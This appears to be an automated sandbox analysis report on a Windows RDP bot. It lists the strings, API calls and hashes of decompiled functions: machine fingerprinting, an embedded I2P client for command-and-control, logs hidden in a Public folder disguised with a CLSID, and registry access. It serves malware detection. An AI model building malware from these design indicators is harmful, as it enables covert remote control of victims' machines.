String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
API String ID: 3828489143-3798070276
Opcode ID: c298d8cbf015c6974a909995c04872e98ce01e6f146e4eb61ae2d7880d967112
Instruction ID: ed6e317a93753eac7b96c1ce1c0d93f7dbc0724b82c35da33a0162eeaabfbbfb
Opcode Fuzzy Hash: c298d8cbf015c6974a909995c04872e98ce01e6f146e4eb61ae2d7880d967112
Instruction Fuzzy Hash: EBD10661E0C653A1FB219BDCA4403B97360AF80794F654233EB4E9B2B4DE6DE945C3C2

Function 00007FFE1150330E Relevance: 39.4, APIs: 7, Strings: 19, Instructions: 381
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

KCIT, xrefs: 00007FFE1150333A
-ILCCNC-, xrefs: 00007FFE1150345F
-ILCCNC-, xrefs: 00007FFE11503320
h, xrefs: 00007FFE11503449
, xrefs: 00007FFE115038A4
mem_alloc, xrefs: 00007FFE115039F4
AKAK, xrefs: 00007FFE1150339F
-ILCCNC-, xrefs: 00007FFE115038BA
last-patch, xrefs: 00007FFE11503580
ip-api.com, xrefs: 00007FFE1150365E
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE115039FB
curl/8.4.0, xrefs: 00007FFE11503665
TGER, xrefs: 00007FFE11503454
-VRSCNC-, xrefs: 00007FFE11503919
referrer, xrefs: 00007FFE115035B2
/line?fields=query, xrefs: 00007FFE11503651
--TSCB--, xrefs: 00007FFE11503929
AKAK, xrefs: 00007FFE115038AF
TPCR, xrefs: 00007FFE115033A6

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID:
String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$TGER$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$h$ip-api.com$last-patch$mem_alloc$referrer
API String ID: 0-3139374006
Opcode ID: 912ed4a613681aaa6bc564396e5af2d4c00a87c057b5c2b355731a99e4a5451b
Instruction ID: 7c8c71759facfabf47bd66c5f48b798acbef30fad6c13caf4cb35b33190923a5
Opcode Fuzzy Hash: 912ed4a613681aaa6bc564396e5af2d4c00a87c057b5c2b355731a99e4a5451b
Instruction Fuzzy Hash: C3129F31A0CF8289E7A18B46E4843AE77A9EB84764F104279DA9D477F6DF7CE544CB00

Function 00007FFE11508760 Relevance: 37.7, APIs: 9, Strings: 16, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE115044A4: LoadLibraryA.KERNEL32 ref: 00007FFE115044B2

Part of subcall function 00007FFE11504170: GetModuleHandleExA.KERNEL32 ref: 00007FFE1150418E

strlen.MSVCRT ref: 00007FFE115088B8
strlen.MSVCRT ref: 00007FFE115088D4
strcat.MSVCRT ref: 00007FFE115088F0
strlen.MSVCRT ref: 00007FFE115088F8
strcat.MSVCRT ref: 00007FFE1150891F
strlen.MSVCRT ref: 00007FFE11508927
strcat.MSVCRT ref: 00007FFE11508945
strlen.MSVCRT ref: 00007FFE1150894D
strlen.MSVCRT ref: 00007FFE11508967

Strings

i2p.su3, xrefs: 00007FFE11508989
C_InitI2P, xrefs: 00007FFE115089D8
i2p, xrefs: 00007FFE1150892C
--reseed, xrefs: 00007FFE115087D9
Done, xrefs: 00007FFE11508A2E
C_StartI2P, xrefs: 00007FFE115089F7
[I] (%s) -> %s, xrefs: 00007FFE11508A3C
i2p_init, xrefs: 00007FFE11508A35, 00007FFE11508A5B
i2p, xrefs: 00007FFE11508A1E
libi2p.dll, xrefs: 00007FFE11508852
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11508A62
--datadi, xrefs: 00007FFE115087A4
.file=, xrefs: 00007FFE115087E3
i2p.su3, xrefs: 00007FFE11508952
i2p.conf, xrefs: 00007FFE11508900
--conf=, xrefs: 00007FFE1150876A

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strcat$HandleLibraryLoadModule
String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
API String ID: 1893813203-492052463
Opcode ID: ec477a8afcc3ffbe5cba8315cf09a0bb209ea99bf45b2283e1accf5b33ce7163
Instruction ID: 0665f89e8ac4d9cdefac9acc6d10181d14d0bcfd63acdd72924e977ac2d3810e
Opcode Fuzzy Hash: ec477a8afcc3ffbe5cba8315cf09a0bb209ea99bf45b2283e1accf5b33ce7163
Instruction Fuzzy Hash: 7271C071A0CF8291EB229B56F4403FE639AAB443A0F4411B5DA4D47BB9EF7CD549C740

Function 00007FFE1150143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1150145C
GetLastError.KERNEL32 ref: 00007FFE11501590

Part of subcall function 00007FFE11504170: GetModuleHandleExA.KERNEL32 ref: 00007FFE1150418E

strlen.MSVCRT ref: 00007FFE115014AE
strlen.MSVCRT ref: 00007FFE115014CA
strcat.MSVCRT ref: 00007FFE115014E5
strlen.MSVCRT ref: 00007FFE115014ED
strlen.MSVCRT ref: 00007FFE11501502
fopen.MSVCRT ref: 00007FFE11501528

Strings

log, xrefs: 00007FFE11501517
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1150157A
P, xrefs: 00007FFE1150161A
~, xrefs: 00007FFE11501615
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE11501555
[I] (%s) -> %s, xrefs: 00007FFE115016DB
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFE1150148E, 00007FFE115014A4, 00007FFE115014DB, 00007FFE115014F8, 00007FFE11501547
cnccli.l, xrefs: 00007FFE1150150A
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE11501667
, xrefs: 00007FFE115015AE
Done, xrefs: 00007FFE115016CD
debug_init, xrefs: 00007FFE1150154E, 00007FFE11501573, 00007FFE1150159B, 00007FFE11501660, 00007FFE115016D4
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE115015A2

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
API String ID: 3395718042-315528054
Opcode ID: ca742bf4e2a3ff23386036bfd4bb469964a4852543b030b5e170109e5adcf0e1
Instruction ID: 79904c75f851a7976a5ee6ef39edc942ccde07faee7c5428420de02a07411379
Opcode Fuzzy Hash: ca742bf4e2a3ff23386036bfd4bb469964a4852543b030b5e170109e5adcf0e1
Instruction Fuzzy Hash: 2E515D50E0CF0395FB219793A8C43BC365EAF447A4F5850BAD90E0B6B2DF6DE9468742

Function 00007FFE1330A3AC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1330A3CC
GetLastError.KERNEL32 ref: 00007FFE1330A500

Part of subcall function 00007FFE13307140: GetModuleHandleExA.KERNEL32 ref: 00007FFE1330715E

strlen.MSVCRT ref: 00007FFE1330A41E
strlen.MSVCRT ref: 00007FFE1330A43A
strcat.MSVCRT ref: 00007FFE1330A455
strlen.MSVCRT ref: 00007FFE1330A45D
strlen.MSVCRT ref: 00007FFE1330A472
fopen.MSVCRT ref: 00007FFE1330A498

Strings

Done, xrefs: 00007FFE1330A63D
evtsrv.l, xrefs: 00007FFE1330A47A
, xrefs: 00007FFE1330A51E
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE1330A512
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE1330A5D7
[I] (%s) -> %s, xrefs: 00007FFE1330A64B
~, xrefs: 00007FFE1330A585
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1330A4EA
log, xrefs: 00007FFE1330A487
P, xrefs: 00007FFE1330A58A
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE1330A4C5
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log, xrefs: 00007FFE1330A3FE, 00007FFE1330A414, 00007FFE1330A44B, 00007FFE1330A468, 00007FFE1330A4B7
debug_init, xrefs: 00007FFE1330A4BE, 00007FFE1330A4E3, 00007FFE1330A50B, 00007FFE1330A5D0, 00007FFE1330A644

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
API String ID: 3395718042-190452282
Opcode ID: 3d5c357b8a3488791b49d05f85c642e4e73c3433f412dce6f83d43bf693f2cba
Instruction ID: 14fafaeed59be1093009fec9f4141372676b142cc4a8ac52e53ca465f5a3cc0a
Opcode Fuzzy Hash: 3d5c357b8a3488791b49d05f85c642e4e73c3433f412dce6f83d43bf693f2cba
Instruction Fuzzy Hash: 6D516F50A0CE07CDFA109B43B8843BC2661AF35764F4042B2C52E7A7B7DE6DA987930D

Function 00007FFE0EB4143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB4145C
GetLastError.KERNEL32 ref: 00007FFE0EB41590

Part of subcall function 00007FFE0EB41770: GetModuleHandleExA.KERNEL32 ref: 00007FFE0EB4178E

strlen.MSVCRT ref: 00007FFE0EB414AE
strlen.MSVCRT ref: 00007FFE0EB414CA
strcat.MSVCRT ref: 00007FFE0EB414E5
strlen.MSVCRT ref: 00007FFE0EB414ED
strlen.MSVCRT ref: 00007FFE0EB41502
fopen.MSVCRT ref: 00007FFE0EB41528

Strings

Done, xrefs: 00007FFE0EB416CD
, xrefs: 00007FFE0EB415AE
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0EB41555
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB4157A
debug_init, xrefs: 00007FFE0EB4154E, 00007FFE0EB41573, 00007FFE0EB4159B, 00007FFE0EB41660, 00007FFE0EB416D4
log, xrefs: 00007FFE0EB41517
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0EB41667
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFE0EB4148E, 00007FFE0EB414A4, 00007FFE0EB414DB, 00007FFE0EB414F8, 00007FFE0EB41547
[I] (%s) -> %s, xrefs: 00007FFE0EB416DB
rdpctl.l, xrefs: 00007FFE0EB4150A
P, xrefs: 00007FFE0EB4161A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0EB415A2
~, xrefs: 00007FFE0EB41615

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
API String ID: 3395718042-1794035234
Opcode ID: c0500373ee09827ee142d1d9492b311746de8089aa615731dc60aa0a94030b99
Instruction ID: c656c0e953c543a6370e1b9f50561b62b8de1dd027137567ebb6e88f530c3396
Opcode Fuzzy Hash: c0500373ee09827ee142d1d9492b311746de8089aa615731dc60aa0a94030b99
Instruction Fuzzy Hash: AC517C91E1D70782FA30AF59A8803B92365EF04784F984032D9CE4A2B6DE6CF9C58F41

Function 00007FFE0EBD143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EBD145C
GetLastError.KERNEL32 ref: 00007FFE0EBD1590

Part of subcall function 00007FFE0EBD9CC0: GetModuleHandleExA.KERNEL32 ref: 00007FFE0EBD9CDE

strlen.MSVCRT ref: 00007FFE0EBD14AE
strlen.MSVCRT ref: 00007FFE0EBD14CA
strcat.MSVCRT ref: 00007FFE0EBD14E5
strlen.MSVCRT ref: 00007FFE0EBD14ED
strlen.MSVCRT ref: 00007FFE0EBD1502
fopen.MSVCRT ref: 00007FFE0EBD1528

Strings

prgmgr.l, xrefs: 00007FFE0EBD150A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE0EBD148E, 00007FFE0EBD14A4, 00007FFE0EBD14DB, 00007FFE0EBD14F8, 00007FFE0EBD1547
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0EBD1555
P, xrefs: 00007FFE0EBD161A
~, xrefs: 00007FFE0EBD1615
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EBD157A
Done, xrefs: 00007FFE0EBD16CD
debug_init, xrefs: 00007FFE0EBD154E, 00007FFE0EBD1573, 00007FFE0EBD159B, 00007FFE0EBD1660, 00007FFE0EBD16D4
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0EBD1667
log, xrefs: 00007FFE0EBD1517
, xrefs: 00007FFE0EBD15AE
[I] (%s) -> %s, xrefs: 00007FFE0EBD16DB
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0EBD15A2

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
API String ID: 3395718042-2735303109
Opcode ID: 4c8c7b1f501ae0fbbe7ec8e07eea4ca15baf89deede0404f13feed1bd5c2cc26
Instruction ID: dda68b26fb108725435e81f55224c5053a319fa912c31e3720b6d616129f1e91
Opcode Fuzzy Hash: 4c8c7b1f501ae0fbbe7ec8e07eea4ca15baf89deede0404f13feed1bd5c2cc26
Instruction Fuzzy Hash: B6518D50E1E74386FB309F58A8803F82691AF05788F544032D9CE473BBEE2DA985CF41

Function 00007FFE0EC0317C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EC0319C
GetLastError.KERNEL32 ref: 00007FFE0EC032D0

Part of subcall function 00007FFE0EC01E40: GetModuleHandleExA.KERNEL32 ref: 00007FFE0EC01E5E

strlen.MSVCRT ref: 00007FFE0EC031EE
strlen.MSVCRT ref: 00007FFE0EC0320A
strcat.MSVCRT ref: 00007FFE0EC03225
strlen.MSVCRT ref: 00007FFE0EC0322D
strlen.MSVCRT ref: 00007FFE0EC03242
fopen.MSVCRT ref: 00007FFE0EC03268

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EC032BA
log, xrefs: 00007FFE0EC03257
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0EC033A7
~, xrefs: 00007FFE0EC03355
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFE0EC031CE, 00007FFE0EC031E4, 00007FFE0EC0321B, 00007FFE0EC03238, 00007FFE0EC03287
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0EC03295
P, xrefs: 00007FFE0EC0335A
, xrefs: 00007FFE0EC032EE
debug_init, xrefs: 00007FFE0EC0328E, 00007FFE0EC032B3, 00007FFE0EC032DB, 00007FFE0EC033A0, 00007FFE0EC03414
Done, xrefs: 00007FFE0EC0340D
[I] (%s) -> %s, xrefs: 00007FFE0EC0341B
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0EC032E2
dwlmgr.l, xrefs: 00007FFE0EC0324A

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
API String ID: 3395718042-2859552336
Opcode ID: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
Instruction ID: a146227539785c2fe24afed5a1c5204a23cb0bbd3e01710ba213c2e68459c079
Opcode Fuzzy Hash: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
Instruction Fuzzy Hash: A3517054E0C7C7F6FB249B89A8D43B81351AF46784F510072D98E063B2DF6FA9869743

Function 00007FFE0E16143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E16145C
GetLastError.KERNEL32 ref: 00007FFE0E161590

Part of subcall function 00007FFE0E16CC60: GetModuleHandleExA.KERNEL32 ref: 00007FFE0E16CC7E

strlen.MSVCRT ref: 00007FFE0E1614AE
strlen.MSVCRT ref: 00007FFE0E1614CA
strcat.MSVCRT ref: 00007FFE0E1614E5
strlen.MSVCRT ref: 00007FFE0E1614ED
strlen.MSVCRT ref: 00007FFE0E161502
fopen.MSVCRT ref: 00007FFE0E161528

Strings

~, xrefs: 00007FFE0E161615
Done, xrefs: 00007FFE0E1616CD
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0E1615A2
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16157A
, xrefs: 00007FFE0E1615AE
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0E161555
log, xrefs: 00007FFE0E161517
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0E161667
debug_init, xrefs: 00007FFE0E16154E, 00007FFE0E161573, 00007FFE0E16159B, 00007FFE0E161660, 00007FFE0E1616D4
samctl.l, xrefs: 00007FFE0E16150A
P, xrefs: 00007FFE0E16161A
[I] (%s) -> %s, xrefs: 00007FFE0E1616DB
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFE0E16148E, 00007FFE0E1614A4, 00007FFE0E1614DB, 00007FFE0E1614F8, 00007FFE0E161547

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
API String ID: 3395718042-1297835036
Opcode ID: 75ce88114f5ed3673b241250adb80a8e0a3a4f430a2aff4d0550542a4359febc
Instruction ID: 2b1b7227dc494e42412e9eb230d652b9badbfd2ec09cbc4242d57d9e97602156
Opcode Fuzzy Hash: 75ce88114f5ed3673b241250adb80a8e0a3a4f430a2aff4d0550542a4359febc
Instruction Fuzzy Hash: 6A517A90F0D717A5FB209B15B8803BC6365AF46B88F944433D9DE166B3DE6CB946C381

Function 00007FFE1150D6C2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE1150D71C
RegQueryValueExA.ADVAPI32 ref: 00007FFE1150D864

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE1150D892
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE1150DB5B
(key != NULL), xrefs: 00007FFE1150D7BC
NULL, xrefs: 00007FFE1150D8BE, 00007FFE1150DB6C, 00007FFE1150DB78
, xrefs: 00007FFE1150D8A7
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150D9DD
(root != NULL), xrefs: 00007FFE1150D789
(value != NULL), xrefs: 00007FFE1150D7EF
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1150D73E
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1150D782, 00007FFE1150D7B5, 00007FFE1150D7E8, 00007FFE1150D81B
